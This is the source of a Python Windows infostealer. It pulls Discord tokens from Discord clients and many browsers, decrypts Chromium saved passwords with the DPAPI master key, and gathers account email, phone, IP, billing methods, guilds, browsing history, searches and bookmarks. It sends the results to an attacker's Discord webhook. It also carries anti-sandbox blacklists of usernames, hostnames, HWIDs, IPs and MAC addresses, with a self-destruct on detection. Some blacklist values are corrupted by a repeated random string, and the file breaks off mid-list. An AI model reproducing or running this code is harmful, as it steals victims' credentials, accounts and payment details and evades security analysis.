import base64, json, os, re, shutil, sqlite3, subprocess, sys, uuid, psutil, requests from threading import Thread from zipfile import ZipFile from Crypto.Cipher import AES from discord import Embed, File, RequestsWebhookAdapter, Webhook from win32crypt import CryptUnprotectData def main() -> None: debug() webhook = "$$$$WEBHOOK$$$$" threads = [] for operation in [discord, chromium,]: try: thread = Thread(target=operation, args=(webhook,)) thread.start() threads.append(thread) except: continue for thread in threads: try: thread.join() except: continue class discord(): def __init__(self, webhook) -> None: self.baseurl = "https://discord.com/api/v9/users/@me" self.appdata = os.getenv("localappdata") self.roaming = os.getenv("appdata") self.regex = r"[\\w-]{24,26}\\.[\\w-]{6}\\.[\\w-]{27,38}|mfa\\.\\S{54,84}" self.encrypted_regex = r"dQw4w9WgXcQ:[^\"]*" self.tokens = [] self.ids = [] self.grabTokens() self.upload_accounts(webhook) def calc_flags(self, flags: int) -> list: flags_dict = { "DISCORD_EMPLOYEE": { "emoji": "<:DiscordStaff:1026524506627522563>", "shift": 0, "ind": 1 }, "DISCORD_PARTNER": { "emoji": "<:DiscordPartner:1026524503465009214>", "shift": 1, "ind": 2 }, "HYPESQUAD_EVENTS": { "emoji": "<:HypeSquadEvent:1026524521248858152>", "shift": 2, "ind": 4 }, "BUG_HUNTER_LEVEL_1": { "emoji": "<:Hunter1:1026524496561188925>", "shift": 3, "ind": 4 }, "HOUSE_BRAVERY": { "emoji": "<:HypeSquadBravery:1026524517088100473>", "shift": 6, "ind": 64 }, "HOUSE_BRILLIANCE": { "emoji": "<:HypeSquadBrilliance:1026524518753247284>", "shift": 7, "ind": 128 }, "HOUSE_BALANCE": { "emoji": "<:HypeSquadBalance:1026524514101772410>", "shift": 8, "ind": 256 }, "EARLY_SUPPORTER": { "emoji": "<:EarlySupporter:1026524512486965308>", "shift": 9, "ind": 512 }, "BUG_HUNTER_LEVEL_2": { "emoji": "<:Hunter2:1026524499006476379>", "shift": 14, "ind": 16384 }, "VERIFIED_BOT_DEVELOPER": { "emoji": "<:BotDev:1026524525166350377>", "shift": 17, "ind": 131072 }, "CERTIFIED_MODERATOR": { "emoji": "<:DiscordMod:1026524501258805270> ", "shift": 18, "ind": 262144 }, "SPAMMER": { "emoji": ":skull:", "shift": 20, "ind": 1048704 }, } return [[flags_dict[flag]['emoji'], flags_dict[flag]['ind']] for flag in flags_dict if int(flags) & (1 << flags_dict[flag]["shift"])] def upload_accounts(self, webhook) -> None: webhook = Webhook.from_url(webhook, adapter=RequestsWebhookAdapter()) for token in self.tokens: headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36', 'Content-Type': 'application/json', 'Authorization': token, } r = requests.get(self.baseurl, headers=headers).json() b = requests.get("https://discord.com/api/v6/users/@me/billing/payment-sources", headers=headers) username = r["username"] + "#" + r["discriminator"] userid = r["id"] email = r["email"] phone = r["phone"] avatar = f"https://cdn.discordapp.com/avatars/{userid}/{r['avatar']}.gif" if requests.get(f"https://cdn.discordapp.com/avatars/{userid}/{r['avatar']}.gif").status_code == 200 else f"https://cdn.discordapp.com/avatars/{userid}/{r['avatar']}.png" badges = ' '.join([flag[0] for flag in self.calc_flags(r['public_flags'])[::-1]]) try: nitro = '`Nitro Classic`' if r['premium_type'] == 1 else '`Nitro Boost`' except KeyError: nitro = '`None`' if b.json() == []: methods = "`None`" else: methods = "" try: for method in b.json(): if method['type'] == 1: methods += "<:VISA:1026531551678316544> " elif method['type'] == 2: methods += "<:PayPal:1026531549694394458> " else: methods += "<:Mastercard:1026532279834652802> " except TypeError: methods += "?" g = requests.get("https://discord.com/api/v9/users/@me/guilds?with_counts=true", headers=headers) hq_guilds = "" try: for guild in g.json(): admin = True if guild['permissions'] == '4398046511103' else False if admin and guild['approximate_member_count'] >= 100: i = requests.get(f"https://discord.com/api/v9/guilds/{guild['id']}/invites", headers=headers) owner = "YES" if guild['owner'] else "no lol" if len(i.json()) > 1: hq_guilds += f"\u200b\n**{guild['name']} ({guild['id']})** \n Owner: `{owner}` ~ Members: `{guild['approximate_member_count']}` ~ (.gg/{i.json()[0]['code']})" else: hq_guilds += f"\u200b\n**{guild['name']} ({guild['id']})** \n Owner: `{owner}` ~ `(No Invites)`" except TypeError or KeyError: pass f = requests.get("https://discordapp.com/api/v6/users/@me/relationships", headers=headers) hq_friends = "" try: for friend in f.json(): unprefered_flags = [64, 128, 256, 1048704] inds = [flag[1] for flag in self.calc_flags(friend['user']['public_flags'])[::-1]] for flag in unprefered_flags: inds.remove(flag) if flag in inds else None if inds != []: hq_badges = ' '.join([flag[0] for flag in self.calc_flags(friend['user']['public_flags'])[::-1]]) hq_friends += f"{hq_badges} - `{friend['user']['username']}#{friend['user']['discriminator']} ({friend['user']['id']})`\n" except TypeError: pass pc_name = os.getenv("USERNAME") ip = requests.get("https://checkip.amazonaws.com").text embed = Embed(title=f"{pc_name} ~ {username} ({userid})", color=0x2f3136) embed.add_field(name="Token:", value=f"```{token}```", inline=False) embed.add_field(name="Nitro:", value=f"{nitro}", inline=True) embed.add_field(name="Badges:", value=f"{badges if badges != '' else '`None`'}", inline=True) embed.add_field(name="Billing:", value=f"{methods if methods != '' else '`None`'}", inline=True) embed.add_field(name="Email:", value=f"`{email if email != None else 'None'}`", inline=True) embed.add_field(name="IP Address:", value=f"`{ip}`", inline=True) embed.add_field(name="Phone:", value=f"`{phone if phone != None else 'None'}`", inline=True) embed.add_field(name="\u200b", value=f"\u200b", inline=False) if hq_guilds != "" else None if hq_guilds != "": embed.add_field(name="HQ Guilds:", value=f"{hq_guilds}", inline=False) embed.add_field(name="\u200b", value=f"\u200b", inline=False) if hq_friends != "" else None if hq_friends != "": embed.add_field(name="<:Syringe:1038082839264112640> HQ Friends:", value=f"{hq_friends}", inline=False) embed.add_field(name="\u200b", value=f"\u200b", inline=False) if hq_guilds or hq_friends != "" else None webhook.send(embed=embed, username=username, avatar_url=avatar) def decrypt_val(self, buff, master_key) -> str: try: iv = buff[3:15] payload = buff[15:] cipher = AES.new(master_key, AES.MODE_GCM, iv) decrypted_pass = cipher.decrypt(payload) decrypted_pass = decrypted_pass[:-16].decode() return decrypted_pass except Exception: return "Failed to decrypt password" def get_master_key(self, path) -> str: with open(path, "r", encoding="utf-8") as f: c = f.read() local_state = json.loads(c) master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"]) master_key = master_key[5:] master_key = CryptUnprotectData(master_key, None, None, None, 0)[1] return master_key def grabTokens(self): paths = { 'Discord': self.roaming + '\\discord\\Local Storage\\leveldb\\', 'Discord Canary': self.roaming + '\\discordcanary\\Local Storage\\leveldb\\', 'Lightcord': self.roaming + '\\Lightcord\\Local Storage\\leveldb\\', 'Discord PTB': self.roaming + '\\discordptb\\Local Storage\\leveldb\\', 'Opera': self.roaming + '\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\', 'Opera GX': self.roaming + '\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\', 'Amigo': self.appdata + '\\Amigo\\User Data\\Local Storage\\leveldb\\', 'Torch': self.appdata + '\\Torch\\User Data\\Local Storage\\leveldb\\', 'Kometa': self.appdata + '\\Kometa\\User Data\\Local Storage\\leveldb\\', 'Orbitum': self.appdata + '\\Orbitum\\User Data\\Local Storage\\leveldb\\', 'CentBrowser': self.appdata + '\\CentBrowser\\User Data\\Local Storage\\leveldb\\', '7Star': self.appdata + '\\7Star\\7Star\\User Data\\Local Storage\\leveldb\\', 'Sputnik': self.appdata + '\\Sputnik\\Sputnik\\User Data\\Local Storage\\leveldb\\', 'Vivaldi': self.appdata + '\\Vivaldi\\User Data\\Default\\Local Storage\\leveldb\\', 'Chrome SxS': self.appdata + '\\Google\\Chrome SxS\\User Data\\Local Storage\\leveldb\\', 'Chrome': self.appdata + '\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb\\', 'Chrome1': self.appdata + '\\Google\\Chrome\\User Data\\Profile 1\\Local Storage\\leveldb\\', 'Chrome2': self.appdata + '\\Google\\Chrome\\User Data\\Profile 2\\Local Storage\\leveldb\\', 'Chrome3': self.appdata + '\\Google\\Chrome\\User Data\\Profile 3\\Local Storage\\leveldb\\', 'Chrome4': self.appdata + '\\Google\\Chrome\\User Data\\Profile 4\\Local Storage\\leveldb\\', 'Chrome5': self.appdata + '\\Google\\Chrome\\User Data\\Profile 5\\Local Storage\\leveldb\\', 'Epic Privacy Browser': self.appdata + '\\Epic Privacy Browser\\User Data\\Local Storage\\leveldb\\', 'Microsoft Edge': self.appdata + '\\Microsoft\\Edge\\User Data\\Defaul\\Local Storage\\leveldb\\', 'Uran': self.appdata + '\\uCozMedia\\Uran\\User Data\\Default\\Local Storage\\leveldb\\', 'Yandex': self.appdata + '\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb\\', 'Brave': self.appdata + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\leveldb\\', 'Iridium': self.appdata + '\\Iridium\\User Data\\Default\\Local Storage\\leveldb\\' } for name, path in paths.items(): if not os.path.exists(path): continue disc = name.replace(" ", "").lower() if "cord" in path: if os.path.exists(self.roaming+f'\\{disc}\\Local State'): for file_name in os.listdir(path): if file_name[-3:] not in ["log", "ldb"]: continue for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]: for y in re.findall(self.encrypted_regex, line): token = self.decrypt_val(base64.b64decode( y.split('dQw4w9WgXcQ:')[1]), self.get_master_key(self.roaming+f'\\{disc}\\Local State')) try: r = requests.get(self.baseurl, headers={ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36', 'Content-Type': 'application/json', 'Authorization': token, }) except Exception: pass if r.status_code == 200: uid = r.json()['id'] if uid not in self.ids: self.tokens.append(token) self.ids.append(uid) else: for file_name in os.listdir(path): if file_name[-3:] not in ["log", "ldb"]: continue for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]: for token in re.findall(self.regex, line): try: r = requests.get(self.baseurl, headers={ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36', 'Content-Type': 'application/json', 'Authorization': token, }) except Exception: pass if r.status_code == 200: uid = r.json()['id'] if uid not in self.ids: self.tokens.append(token) self.ids.append(uid) if os.path.exists(self.roaming+"\\Mozilla\\Firefox\\Profiles"): for path, _, files in os.walk(self.roaming+"\\Mozilla\\Firefox\\Profiles"): for _file in files: if not _file.endswith('.sqlite'): continue for line in [x.strip() for x in open(f'{path}\\{_file}', errors='ignore').readlines() if x.strip()]: for token in re.findall(self.regex, line): try: r = requests.get(self.baseurl, headers={ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36', 'Content-Type': 'application/json', 'Authorization': token, }) except Exception: pass if r.status_code == 200: uid = r.json()['id'] if uid not in self.ids: self.tokens.append(token) self.ids.append(uid) class chromium(): def __init__(self, webhook: str) -> None: webhook = Webhook.from_url(webhook, adapter=RequestsWebhookAdapter()) self.appdata = os.getenv('LOCALAPPDATA') self.roaming = os.getenv('APPDATA') self.username = os.getenv("USERNAME") self.temp = os.getenv("TEMP") self.browsers = { 'google-chrome': self.appdata + '\\Google\\Chrome\\User Data', 'microsoft-edge': self.appdata + '\\Microsoft\\Edge\\User Data', 'brave-browser': self.appdata + '\\BraveSoftware\\Brave-Browser\\User Data', } self.profiles = [ 'Default', 'Profile 1', 'Profile 2', 'Profile 3', 'Profile 4', 'Profile 5', ] for name, path in self.browsers.items(): try: self.masterkey = self.get_master_key(path + '\\Local State') except FileNotFoundError: continue self.files = [ f'{self.temp}' + name + '-passwords.txt', f'{self.temp}' + name + '-history.txt', f'{self.temp}' + name + '-search-history.txt', f'{self.temp}' + name + '-bookmarks.txt', ] for file in self.files: with open(file, 'w') as f: pass for profile in self.profiles: self.password(name, path, profile) self.web_history(name, path, profile) self.search_history(name, path, profile) self.bookmarks(name, path, profile) with ZipFile(f'{self.temp}' + name + '-payload.zip', 'w') as zip: for file in self.files: zip.write(file) for file in self.files: if os.path.isfile(file): os.remove(file) if os.path.isfile(f'{self.temp}' + name + '-payload.zip'): if not os.path.getsize(f'{self.temp}' + name + '-payload.zip') > 8000000: webhook.send(file=File(f'{self.temp}' + name + '-payload.zip'), username=self.username, avatar_url="https://cdn.discordapp.com/avatars/1010965175215607908/765a59eae33221c0788849cd1fa59742.png?size=1024") os.remove(f'{self.temp}' + name + '-payload.zip') def get_master_key(self, path) -> str: with open(path, "r", encoding="utf-8") as f: c = f.read() local_state = json.loads(c) master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"]) master_key = master_key[5:] master_key = CryptUnprotectData(master_key, None, None, None, 0)[1] return master_key def decrypt_password(self, buff, master_key): try: iv = buff[3:15] payload = buff[15:] cipher = AES.new(master_key, AES.MODE_GCM, iv) decrypted_pass = cipher.decrypt(payload) decrypted_pass = decrypted_pass[:-16].decode() return decrypted_pass except: return None def password(self, name, path, profile): path += '\\' + profile + '\\Login Data' if not os.path.isfile(path): return vault = name.title() + '-Vault.db' shutil.copy2(path, vault) conn = sqlite3.connect(vault) cursor = conn.cursor() with open(f'{self.temp}' + name + '-passwords.txt', 'a', encoding="utf-8") as f: for res in cursor.execute("SELECT origin_url, username_value, password_value FROM logins").fetchall(): url, username, password = res password = self.decrypt_password(password, self.masterkey) if url != "" and username != "" and password != "": f.write("Username: {:<40} Password: {:<40} Website: {}\n ".format(username, password, url)) cursor.close() conn.close() os.remove(vault) def web_history(self, name, path, profile): path += '\\' + profile + '\\History' if not os.path.isfile(path): return vault = name.title() + '-Vault.db' shutil.copy2(path, vault) conn = sqlite3.connect(vault) cursor = conn.cursor() with open(f'{self.temp}' + name + '-web-history.txt', 'a', encoding="utf-8") as f: sites = [] for res in cursor.execute("SELECT url, title, visit_count, last_visit_time FROM urls").fetchall(): url, title, visit_count, last_visit_time = res if url != "" and title != "" and visit_count != "" and last_visit_time != "": sites.append((url, title, visit_count, last_visit_time)) sites.sort(key=lambda x: x[3], reverse=True) for site in sites: f.write("Visit Count: {:<6} Title: {:<40}\n".format(site[2], site[1])) cursor.close() conn.close() os.remove(vault) def search_history(self, name, path, profile): path += '\\' + profile + '\\History' if not os.path.isfile(path): return vault = name.title() + '-Vault.db' shutil.copy2(path, vault) conn = sqlite3.connect(vault) cursor = conn.cursor() with open(f'{self.temp}' + name + '-search-history.txt', 'a', encoding="utf-8") as f: for res in cursor.execute("SELECT term FROM keyword_search_terms").fetchall(): term = res[0] if term != "": f.write("Search: {}\n".format(term)) cursor.close() conn.close() os.remove(vault) def bookmarks(self, name, path, profile): path += '\\' + profile + '\\Bookmarks' if not os.path.isfile(path): return shutil.copy2(path, 'bookmarks.json') with open('bookmarks.json', 'r', encoding="utf-8") as f: for item in json.loads(f.read())['roots']['bookmark_bar']['children']: if 'children' in item: for child in item['children']: if 'url' in child: with open(f'{self.temp}' + name + '-bookmarks.txt', 'a', encoding="utf-8") as f: f.write("URL: {}\n".format(child['url'])) elif 'url' in item: with open(f'{self.temp}' + name + '-bookmarks.txt', 'a', encoding="utf-8") as f: f.write("URL: {}\n".format(item['url'])) os.remove('bookmarks.json') class debug: def __init__(self): if self.checks(): self.self_destruct() def checks(self): debugging = False self.blackListedUsers = ['WDAGUtilityAccount', 'Abby', 'hmarc', 'patex', 'RDhJ0CNFevzX', 'kEecfMwgj', 'Frank', '8Nl0ColNQ5bq', 'Lisa', 'John', 'george', 'PxmdUOpVyx', '8VizSM', 'w0fjuOVmCcP5A', 'lmVwjj9b', 'PqONjHVwexsS', '3u2v9m8', 'Julia', 'HEUeRzl', 'fred', 'server', 'BvJChRPnsxn', 'Harry Johnson', 'SqgFOf3G', 'Lucas', 'mike', 'PateX', 'h7dk1xPr', 'Louise', 'User01', 'test', 'RGzcBUyrznReg'] self.blackListedPCNames = ['BEE7370C-8C0C-4', 'DESKTOP-NAKFFMT', 'WIN-5E07COS9ALR', 'B30F0242-1C6A-4', 'DESKTOP-VRSQLAG', 'Q9IATRKPRH', 'XC64ZB', 'DESKTOP-D019GDM', 'DESKTOP-WI8CLET', 'SERVER1', 'LISA-PC', 'JOHN-PC', 'DESKTOP-B0T93D6', 'DESKTOP-1PYKP29', 'DESKTOP-1Y2433R', 'WILEYPC', 'WORK', '6C4E733F-C2D9-4', 'RALPHS-PC', 'DESKTOP-WG3MYJS', 'DESKTOP-7XC6GEZ', 'DESKTOP-5OV9S0O', 'QarZhrdBpj', 'ORELEEPC', 'ARCHIBALDPC', 'JULIA-PC', 'd1bnJkfVlH', 'NETTYPC', 'DESKTOP-BUGIO', 'DESKTOP-CBGPFEE', 'SERVER-PC', 'TIQIYLA9TW5M', 'DESKTOP-KALVINO', 'COMPNAME_4047', 'DESKTOP-19OLLTD', 'DESKTOP-DE369SE', 'EA8C2E2A-D017-4', 'AIDANPC', 'LUCAS-PC', 'MARCI-PC', 'ACEPC', 'MIKE-PC', 'DESKTOP-IAPKN1P', 'DESKTOP-NTU7VUO', 'LOUISE-PC', 'T00917', 'test42'] self.blackListedHWIDS = ['7AB5C494-39F5-4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV6F3CA5EC-BEC9-4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV00000000-0000-0000-0000-AC1F6BD04972', '00000000-0000-0000-0000-000000000000', '5BD24D56-789F-8468-7CDC-CAA7222CC121', '4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZVD235177420A7', '4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZVAC1F6BD048FE', 'EB16924B-FB6D-4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZVC7D23342-A5D4-68A1-59AC-CF40F735B363', '63203342-0EB0-AA1A-4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZVD9142042-8F51-5EFF-D5F8-EE9AE3D1602A', '4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV33A1ADA5AC27', '79AF5279-16CF-4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV6ECEAF72-3548-4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV12204D56-28C0-AB03-51B7-4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV1B06-4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZVE7F69D026428', '9921DE3A-5C1A-DF11-9078-563412000026', 'CC5B3F62-2A04-4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZVBE784D56-81F5-2C8D-9D4B-5AB56F05D86E', 'ACA69200-3C4C-11EA-8000-3CECEF4401AA', '3F284CA4-8BDF-4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV503734826431', '032E02B4-0499-05C3-0806-3C0700080009', 'DD9C3342-FB80-9A31-EB04-5794E5AE2B4C', 'E08DE9AA-C704-4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV5E3E7FE0-2636-4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV12EE3342-87A2-32DE-A390-4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZVD1F2-DF37-68AE-C10F60BFB462', 'F5744000-3C78-11EA-8000-3CECEF43FEFE', 'FA8C2042-205D-13B0-FCB5-C5CC55577A35', 'C6B32042-4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV', '050C3342-FADD-AEDF-EF24-C6454E1A73C9', '4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV3CECEF4400D0', '5EBD2E42-1DB8-78A6-0EC3-031B661D5C57', '9C6D1742-046D-BC94-ED09-C36F70CC9A91', '907A2A79-7116-4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV1D4D3342-D6C4-710C-98A3-9CC6571234D5', 'CE352E42-9339-8484-293A-BD50CDC639A5', '60C83342-0A97-928D-7316-5F1080A78E72', '02AD9898-FA37-11EB-AC55-1D0C0A67EA8A', 'DBCC3514-FA57-4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZVE78A2EE5BD0D', 'CEFC836C-8CB1-4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZVD2DC3342-396C-6737-A8F6-0C6673C1DE08', 'EADD1742-4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV', '921E2042-70D3-F9F1-8CBD-B398A21F89C6'] self.blackListedIPS = ['88.132.231.71', '78.139.8.50', '20.99.160.173', '88.153.199.169', '84.147.62.12', '194.154.78.160', '92.211.109.160', '195.74.76.222', '188.105.91.116', '34.105.183.68', '92.211.55.199', '79.104.209.33', '95.25.204.90', '34.145.89.174', '109.74.154.90', '109.145.173.169', '34.141.146.114', '212.119.227.151', '195.239.51.59', '192.4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV154.92', '213.33.142.50', '109.74.154.91', '93.216.75.209', '192.87.28.103', '88.132.226.203', '195.181.175.105', '88.132.225.100', '92.211.192.144', '34.83.4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV248.4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV212.119.227.167', '193.225.193.201', '34.145.195.58', '34.105.0.27', '195.239.51.3', '35.192.93.107'] self.blackListedMacs = ['00:15:5d:00:07:34', '00:e0:4c:b8:7a:58', '00:0c:29:2c:c1:21', '00:25:90:65:39:e4', 'c8:9f:1d:b6:58:e4', '00:25:90:36:65:0c', '00:15:5d:00:00:f3', '2e:b8:24:4d:f7:de', '00:15:5d:13:6d:0c', '00:50:56:a0:dd:00', '00:15:5d:13:66:ca', '56:e8:92:2e:76:0d', 'ac:1f:6b:d0:4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV', '00:15:5d:00:06:4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV', '4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV:fa', '00:15:5d:00:01:81', '4e:79:c0:d9:af:c3', '00:15:5d:b6:e0:cc', '00:15:5d:00:02:26', '00:50:56:b3:05:b4', '1c:99:57:1c:ad:e4', '08:00:27:3a:28:73', '00:15:5d:00:00:c3', '00:50:56:a0:4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV', 'a6:24:aa:ae:e6:12', '08:00:27:4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV', '00:15:5d:00:05:8d', '00:0c:29:52:52:50', '00:50:56:b3:4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV', '1e:6c:34:93:68:64', '00:50:56:a0:61:aa', '4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV:ab', 'ac:1f:6b:d0:4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV', '00:15:5d:23:4c:a3', '00:1b:21:13:33:55', '00:15:5d:00:00:a4', '16:ef:22:04:af:76', '00:15:5d:23:4c:ad', '1a:6c:62:60:3b:f4', '00:15:5d:00:00:1d', '00:50:56:a0:cd:a8', '00:50:56:b3:fa:23', '52:54:00:a0:4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV', '00:50:56:ae:b2:b0', '00:50:56:b3:94:cb', '4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV:c8', '3e:c1:fd:f1:bf:71', '00:50:56:a0:6d:86', '00:50:56:a0:af:75', '00:50:56:b3:dd:03', 'c2:ee:af:fd:29:21', '00:50:56:b3:ee:e1', '00:50:56:a0:84:88', '00:1b:21:13:32:20', '3c:ec:ef:4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV', '32:11:4d:d0:4a:9e', '00:50:56:b3:d0:a7', '94:de:80:de:1a:35', '00:50:56:ae:5d:ea', '00:50:56:b3:14:59', 'ea:02:75:3c:90:9f', '00:e0:4c:4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV', 